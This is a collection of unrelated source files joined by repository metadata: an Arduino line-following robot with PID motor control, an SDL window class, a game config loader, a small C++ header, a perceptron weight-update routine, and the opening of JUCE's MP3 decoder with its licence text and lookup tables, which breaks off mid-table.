digitalWrite(pwm4,LOW);
// State of DIR pins are depending on your physical connection
// if your robot behaves strangely, try changing thses two values
digitalWrite(dir1,HIGH);
digitalWrite(dir2,LOW);
digitalWrite(dir3,LOW);
digitalWrite(dir4,HIGH);
// Begin serial communication with baudrate 9600
Serial.begin(9600);
}
float lastError = 0; // Declare a variable to store previous error
void loop() {
analogWrite(pwm1,255);
analogWrite(pwm2,255);
analogWrite(pwm3,255);
analogWrite(pwm4,255);
digitalWrite(dir1,LOW);//RF
digitalWrite(dir2,LOW);//LF
digitalWrite(dir3,LOW);//LB
digitalWrite(dir4,LOW);//RB
delay(385);
analogWrite(pwm1,0);
analogWrite(pwm2,0);
analogWrite(pwm3,0);
analogWrite(pwm4,0);
delay(1000);
while (true){
digitalWrite(dir1,HIGH);
digitalWrite(dir2,LOW);
digitalWrite(dir3,LOW);
digitalWrite(dir4,HIGH);
digitalWrite(serialEn,LOW); // Set serialEN to LOW to request UART data
while(Serial.available() <= 0); // Wait for data to be available
int positionVal = Serial.read(); // Read incoming data and store in variable positionVal
digitalWrite(serialEn,HIGH); // Stop requesting for UART data
Serial.println(positionVal);
int junc= digitalRead(junctionPulse);
// Serial.print("junction");
// Serial.println(junc);
/*if (junc==1){
while (true){
analogWrite(pwm1,50);
analogWrite(pwm2,50);
analogWrite(pwm3,50);
analogWrite(pwm4,50);
delay(1000);
while (true){
analogWrite(pwm1,0);
analogWrite(pwm2,0);
analogWrite(pwm3,0);
analogWrite(pwm4,0);
} }
}*/
// If no line is detected, stay at the position
if(positionVal == 255) {
analogWrite(pwm1,0);
analogWrite(pwm2,0);
analogWrite(pwm3,0);
analogWrite(pwm4,0);
}
// Else if line detected, calculate the motor speed and apply
else {
float error = positionVal - setPoint; // Calculate the deviation from position to the set point
float motorSpeed = Kp * error + Kd * (error - lastError); // Applying formula of PID
lastError = error; // Store current error as previous error for next iteration use
// Adjust the motor speed based on calculated value
// You might need to interchange the + and - sign if your robot move in opposite direction
float leftMotorSpeed = baseSpeed + motorSpeed;
float rightMotorSpeed = baseSpeed - motorSpeed;
// If the speed of motor exceed max speed, set the speed to max speed
if(rightMotorSpeed > maxSpeed) rightMotorSpeed = maxSpeed;
if(leftMotorSpeed > maxSpeed) leftMotorSpeed = maxSpeed;
// If the speed of motor is negative, set it to 0
if(rightMotorSpeed < 0) rightMotorSpeed = 0;
if(leftMotorSpeed < 0) leftMotorSpeed = 0;
// Serial.print(rightMotorSpeed);
// Serial.print(" ");
// Serial.println(leftMotorSpeed);
// // Writing the motor speed value as output to hardware motor
analogWrite(pwm1,rightMotorSpeed);
analogWrite(pwm4,rightMotorSpeed);
analogWrite(pwm3,leftMotorSpeed);
analogWrite(pwm2,leftMotorSpeed);
}
}
}
|
1197f4d5ed6157a2b033bd3351291faa9152eec5 | be98f69059e467d4b1f2970bfcdd73c94f3cbe62 | /win32.cpp | 8b00b6ad99446ec718bb0fd5bf8d601a11366eca | [] | no_license | nhoudelot/antedominium-by-traction | 0bc3fff258cc4b7b7ead515be1172efafe742726 | defab2a06d120f4052c66bcd59e11ba35232017b | refs/heads/master | 2020-03-07T23:26:18.099082 | 2018-04-02T16:24:07 | 2018-04-02T16:24:07 | 127,781,518 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 649 | cpp | win32.cpp | #include <SDL/SDL.h>
#include "win32.hpp"
extern int OPENGL_XRES;
extern int OPENGL_YRES;
extern bool OPENGL_FULLSCREEN;
Window::Window()
{
}
Window::~Window()
{
}
bool Window::create(bool bflag)
{
SDL_Init(SDL_INIT_VIDEO);
int SDL_flags = SDL_OPENGL;
SDL_ShowCursor(0);
#ifdef FULLSCREEN
SDL_flags += SDL_FULLSCREEN;
#endif
SDL_SetVideoMode(WINDOW_WIDTH, WINDOW_HEIGHT, 0, SDL_flags);
SDL_WM_SetCaption("Ante Dominum",0);
SDL_GL_SetAttribute( SDL_GL_DOUBLEBUFFER, 1 );
return true;
}
void Window::shut()
{
/* ChangeDisplaySettings(NULL, 0);
ReleaseDC(hwnd, hdc);
DestroyWindow(hwnd);*/
}
|
da9f2c6844bad9f7f643e0fe77e5260649313de2 | 8233d0e38af2aa8fb906841c98bcb30bf8788292 | /src/game/game_config.cpp | 06a008fe7901423b49db4bd44e06ff0f6dc52ac9 | [] | no_license | Tarasilya/syla-roads | 814b08b01cf7bf211e5234824c6172be1b1fe0d0 | 402d8358ba9f92badfaefbdfda1d6087986b79a1 | refs/heads/master | 2020-03-24T19:17:39.205702 | 2019-02-22T14:56:39 | 2019-02-22T14:56:39 | 142,917,280 | 2 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,389 | cpp | game_config.cpp | #include "game_config.h"
#include "utils/utils.h"
#include <iostream>
#include <fstream>
GameConfig::GameConfig() {
std::ifstream in("config.txt");
std::string name, value;
while (in >> name) {
in >> value;
std::cerr << "read " << name << " " << value << std::endl;
params_[name] = value;
}
}
std::string GameConfig::GetString(std::string name) {
return params_[name];
}
int GameConfig::GetInt(std::string name) {
return std::stoi(params_[name]);
}
float GameConfig::GetFloat(std::string name) {
return std::stof(params_[name]);
}
std::map<sf::Keyboard::Key, Control> GameConfig::GetControls(int player_index) {
std::map<sf::Keyboard::Key, Control> controls_;
std::string ids = utils::ToStr(player_index);
controls_[GetKey("MOVE_LEFT" + ids)] = MOVE_LEFT;
controls_[GetKey("MOVE_RIGHT" + ids)] = MOVE_RIGHT;
controls_[GetKey("MOVE_UP" + ids)] = MOVE_UP;
controls_[GetKey("MOVE_DOWN" + ids)] = MOVE_DOWN;
controls_[GetKey("SELECT" + ids)] = SELECT;
controls_[GetKey("ROAD_SELECT" + ids)] = ROAD_SELECT;
controls_[GetKey("BUILD" + ids)] = BUILD;
controls_[GetKey("ACT_LOW" + ids)] = ACT_LOW;
controls_[GetKey("ACT_MEDIUM" + ids)] = ACT_MEDIUM;
controls_[GetKey("ACT_HIGH" + ids)] = ACT_HIGH;
controls_[GetKey("DECLARE_WAR" + ids)] = DECLARE_WAR;
return controls_;
}
sf::Keyboard::Key GameConfig::GetKey(std::string name) {
return ToSfKey(params_[name]);
} |
3cfbb06ed5ba253048c0df2c13ae88760d3e70c5 | eaa91a50e9b083f3a236d33bc67c30fc9b0a12c0 | /06/static/header.h | f20cf7e95460e190481edf0fbc6b103e8d733cfa | [] | no_license | fherbine/OC_CPP | e5af99c86bfc42ff0292d1d1f2573b50672ef37c | d0f77ac39f2cf7ce9abc7267b42468e8ad41d91f | refs/heads/master | 2021-05-01T07:15:34.844864 | 2018-02-21T19:35:26 | 2018-02-21T19:35:26 | 121,152,528 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 255 | h | header.h | /*
* Header file for static program
*/
#ifndef HEADER_H_INCLUDED
# define HEADER_H_INCLUDED
# include <iostream>
# include <string>
# include <cmath>
void all_cos(double tab[], int size = 0);
void all_names(std::string tab[], int size = 0);
#endif
|
a49f2dfaa563a3a0c177b53473bea11c3533fff1 | 1e23ec4bd3233379ea15cf07e97a1688e56b488e | /Model/Mode/Learn.cpp | 6920606f2bc3034b0160842c388ccc868d9f68d0 | [] | no_license | NobodyOne04/NeironTest | d6e933699085239cab7073d0f6cddb0f22d78a6e | dbd88992c0922e1470048f9b16d67cf90d8ce828 | refs/heads/master | 2022-01-06T05:36:46.398265 | 2019-05-25T16:37:18 | 2019-05-25T16:37:18 | 188,524,029 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 659 | cpp | Learn.cpp | #include "..\Interfaces\Learn.h"
/* Изменение весов. */
void Learn::changeWeight() {
Base::makePredict();
if (Base::result == Base::ans)return;
int inc = 0;
(Base::result == true) ? (inc = -1) : (inc = 1);
for (int i = 0;i < Base::size;i++)
if (Base::x[i] != 0) Base::weight[i] += inc;
}
/* Реализует процесс обучения. */
void Learn::makeLearn(int col) {
for (int i = 0;i < col;i++) {
if (i % 3 == 0) {
Base::setX();
Base::setWeight();
this->changeWeight();
}
else {
Base::setX();
Base::r.randomeX(Base::size, Base::x, Base::ans);
this->changeWeight();
}
Base::saveWeight();
}
}
|
eab112fdbb223e0f4eb4ef5db47118b130619ab8 | 01c40fe7a439933b13b2cf58d2ca522997b50cbc | /elseIfStatement.cpp | 163f45dd254859f95e91d40462fe10302acc2071 | [] | no_license | azkazufarh/Basic-CPP-Freecodecamp | 15b570b6567b9ef0545dde5187c6500ba44aecc9 | 0c06021d3fc1dbf970677900a08cf1f04fbdae77 | refs/heads/main | 2023-07-27T04:55:33.719512 | 2021-09-12T00:02:34 | 2021-09-12T00:02:34 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 451 | cpp | elseIfStatement.cpp | #include <iostream>
using namespace std;
int main() {
bool isMale = false;
bool isTall = true;
if(isMale && isTall) { //statement && (AND) check value both of these is true
cout << "You are a tall male";
} else if(isMale && !isTall) {
cout << "You are a short male";
} else if(!isMale && isTall) {
cout << "You are tall but no male";
}else { //
cout << "You are a not male and tall";
}
} |
3474c92cc56736c7b87ecb406731f72bdf0b2dbb | 9d33e09e74975a05e0ce82e5eb3fe5a191419944 | /test/ThreadPool_test/test.cpp | f693c25443259575d92e90a6d7d23f0e2a2e7b3a | [
"MIT"
] | permissive | lineCode/Dalin | 7c897cc602b2a2c310c9e180add962bdada1fe3a | 7be1601403f7f2233848b160cf284f9f6b8ba643 | refs/heads/master | 2021-01-22T00:51:31.486733 | 2017-09-02T08:16:18 | 2017-09-02T08:16:18 | 102,194,548 | 1 | 2 | null | 2017-09-02T12:20:03 | 2017-09-02T12:20:03 | null | UTF-8 | C++ | false | false | 1,182 | cpp | test.cpp | //
// test.cpp
//
// Copyright (c) 2017 Jiawei Feng
//
#include "../../src/base/ThreadPool.h"
#include "../../src/base/CountDownLatch.h"
#include "../../src/base/CurrentThread.h"
#include <stdio.h>
#include <string>
#include <unistd.h>
void print()
{
printf("current thread = %d\n", Dalin::CurrentThread::tid());
}
void printString(const std::string taskId)
{
printf("current thread = %d %s\n",
Dalin::CurrentThread::tid(),taskId.c_str());
usleep(50 * 1000);
}
void test(int maxSize)
{
printf("Test ThreadPool with max queue size = %d\n", maxSize);
Dalin::ThreadPool pool("Main ThreadPool");
pool.setMaxQueueSize(maxSize);
pool.start(5);
printf("Adding print task\n");
pool.addTask(print);
pool.addTask(print);
printf("Adding printString task\n");
for (int i = 0; i != 100; ++i) {
std::string taskId("task - ");
taskId += std::to_string(i);
pool.addTask([=](){ printString(taskId); });
}
Dalin::CountDownLatch latch(1);
pool.addTask([&](){ latch.countDown(); });
latch.wait();
pool.stop();
}
int main()
{
test(0);
test(1);
test(5);
test(10);
test(50);
}
|
43c9c7195708c043048131f6faa7b0551b6d30f3 | 4207610c48cbb9021f4420791a9c9d07550b72d9 | /JUCE/modules/juce_audio_formats/codecs/juce_MP3AudioFormat.cpp | f355b644f54646cce0de8f041aa573660aa19369 | [
"GPL-1.0-or-later",
"LicenseRef-scancode-proprietary-license",
"GPL-3.0-only",
"ISC",
"LicenseRef-scancode-unknown-license-reference",
"GPL-2.0-only",
"BSD-3-Clause"
] | permissive | RomanKubiak/ctrlr | d98a910eb46f6cf4324da3fc3ae664cc7dd5aec9 | 8aa00d82127acda42ad9ac9b7b479461e9436aa4 | refs/heads/master | 2023-02-13T00:21:04.546585 | 2022-06-24T10:53:16 | 2022-06-24T10:53:16 | 14,671,067 | 435 | 82 | BSD-3-Clause | 2022-05-31T18:18:23 | 2013-11-24T22:53:11 | C++ | UTF-8 | C++ | false | false | 133,714 | cpp | juce_MP3AudioFormat.cpp | /*
==============================================================================
This file is part of the JUCE library.
Copyright (c) 2020 - Raw Material Software Limited
JUCE is an open source library subject to commercial or open-source
licensing.
By using JUCE, you agree to the terms of both the JUCE 6 End-User License
Agreement and JUCE Privacy Policy (both effective as of the 16th June 2020).
End User License Agreement: www.juce.com/juce-6-licence
Privacy Policy: www.juce.com/juce-privacy-policy
Or: You may also use this code under the terms of the GPL v3 (see
www.gnu.org/licenses).
JUCE IS PROVIDED "AS IS" WITHOUT ANY WARRANTY, AND ALL WARRANTIES, WHETHER
EXPRESSED OR IMPLIED, INCLUDING MERCHANTABILITY AND FITNESS FOR PURPOSE, ARE
DISCLAIMED.
==============================================================================
*/
namespace juce
{
/*
IMPORTANT DISCLAIMER: By choosing to enable the JUCE_USE_MP3AUDIOFORMAT flag and
to compile this MP3 code into your software, you do so AT YOUR OWN RISK! By doing so,
you are agreeing that Raw Material Software Limited is in no way responsible for any patent,
copyright, or other legal issues that you may suffer as a result.
The code in juce_MP3AudioFormat.cpp is NOT guaranteed to be free from infringements of 3rd-party
intellectual property. If you wish to use it, please seek your own independent advice about the
legality of doing so. If you are not willing to accept full responsibility for the consequences
of using this code, then do not enable the JUCE_USE_MP3AUDIOFORMAT setting.
*/
#if JUCE_USE_MP3AUDIOFORMAT
namespace MP3Decoder
{
struct AllocationTable
{
int16 bits, d;
};
constexpr AllocationTable allocTable0[] =
{
{4, 0}, {5, 3}, {3, -3}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191}, {15, -16383}, {16, -32767},
{4, 0}, {5, 3}, {3, -3}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191}, {15, -16383}, {16, -32767},
{4, 0}, {5, 3}, {3, -3}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191}, {15, -16383}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{2, 0}, {5, 3}, {7, 5}, {16, -32767}, {2, 0}, {5, 3}, {7, 5}, {16, -32767}, {2, 0}, {5, 3}, {7, 5}, {16, -32767}, {2, 0}, {5, 3}, {7, 5}, {16, -32767}
};
constexpr AllocationTable allocTable1[] =
{
{4, 0}, {5, 3}, {3, -3}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191}, {15, -16383}, {16, -32767},
{4, 0}, {5, 3}, {3, -3}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191}, {15, -16383}, {16, -32767},
{4, 0}, {5, 3}, {3, -3}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191}, {15, -16383}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767}, {3, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {16, -32767},
{2, 0}, {5, 3}, {7, 5}, {16, -32767}, {2, 0}, {5, 3}, {7, 5}, {16, -32767}, {2, 0}, {5, 3}, {7, 5}, {16, -32767}, {2, 0}, {5, 3}, {7, 5}, {16, -32767},
{2, 0}, {5, 3}, {7, 5}, {16, -32767}, {2, 0}, {5, 3}, {7, 5}, {16, -32767}, {2, 0}, {5, 3}, {7, 5}, {16, -32767}
};
constexpr AllocationTable allocTable2[] =
{
{4, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191}, {15, -16383},
{4, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191}, {15, -16383},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}
};
constexpr AllocationTable allocTable3[] =
{
{4, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191}, {15, -16383},
{4, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191}, {15, -16383},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}
};
constexpr AllocationTable allocTable4[] =
{
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191},
{4, 0}, {5, 3}, {7, 5}, {3, -3}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {8, -127}, {9, -255}, {10, -511}, {11, -1023}, {12, -2047}, {13, -4095}, {14, -8191},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63},
{3, 0}, {5, 3}, {7, 5}, {10, 9}, {4, -7}, {5, -15}, {6, -31}, {7, -63}, {2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9},
{2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9},
{2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9},
{2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9},
{2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9}, {2, 0}, {5, 3}, {7, 5}, {10, 9},
{2, 0}, {5, 3}, {7, 5}, {10, 9}
};
struct BandInfoStruct
{
int16 longIndex[23];
int16 longDiff[22];
int16 shortIndex[14];
int16 shortDiff[13];
};
constexpr BandInfoStruct bandInfo[9] =
{
{ {0, 4, 8, 12, 16, 20, 24, 30, 36, 44, 52, 62, 74, 90, 110, 134, 162, 196, 238, 288, 342, 418, 576},
{4, 4, 4, 4, 4, 4, 6, 6, 8, 8, 10, 12, 16, 20, 24, 28, 34, 42, 50, 54, 76, 158},
{0, 4 * 3, 8 * 3, 12 * 3, 16 * 3, 22 * 3, 30 * 3, 40 * 3, 52 * 3, 66 * 3, 84 * 3, 106 * 3, 136 * 3, 192 * 3},
{4, 4, 4, 4, 6, 8, 10, 12, 14, 18, 22, 30, 56} },
{ {0, 4, 8, 12, 16, 20, 24, 30, 36, 42, 50, 60, 72, 88, 106, 128, 156, 190, 230, 276, 330, 384, 576},
{4, 4, 4, 4, 4, 4, 6, 6, 6, 8, 10, 12, 16, 18, 22, 28, 34, 40, 46, 54, 54, 192},
{0, 4 * 3, 8 * 3, 12 * 3, 16 * 3, 22 * 3, 28 * 3, 38 * 3, 50 * 3, 64 * 3, 80 * 3, 100 * 3, 126 * 3, 192 * 3},
{4, 4, 4, 4, 6, 6, 10, 12, 14, 16, 20, 26, 66} },
{ {0, 4, 8, 12, 16, 20, 24, 30, 36, 44, 54, 66, 82, 102, 126, 156, 194, 240, 296, 364, 448, 550, 576},
{4, 4, 4, 4, 4, 4, 6, 6, 8, 10, 12, 16, 20, 24, 30, 38, 46, 56, 68, 84, 102, 26},
{0, 4 * 3, 8 * 3, 12 * 3, 16 * 3, 22 * 3, 30 * 3, 42 * 3, 58 * 3, 78 * 3, 104 * 3, 138 * 3, 180 * 3, 192 * 3},
{4, 4, 4, 4, 6, 8, 12, 16, 20, 26, 34, 42, 12} },
{ {0, 6, 12, 18, 24, 30, 36, 44, 54, 66, 80, 96, 116, 140, 168, 200, 238, 284, 336, 396, 464, 522, 576},
{6, 6, 6, 6, 6, 6, 8, 10, 12, 14, 16, 20, 24, 28, 32, 38, 46, 52, 60, 68, 58, 54 },
{0, 4 * 3, 8 * 3, 12 * 3, 18 * 3, 24 * 3, 32 * 3, 42 * 3, 56 * 3, 74 * 3, 100 * 3, 132 * 3, 174 * 3, 192 * 3},
{4, 4, 4, 6, 6, 8, 10, 14, 18, 26, 32, 42, 18 } },
{ {0, 6, 12, 18, 24, 30, 36, 44, 54, 66, 80, 96, 114, 136, 162, 194, 232, 278, 332, 394, 464, 540, 576},
{6, 6, 6, 6, 6, 6, 8, 10, 12, 14, 16, 18, 22, 26, 32, 38, 46, 54, 62, 70, 76, 36 },
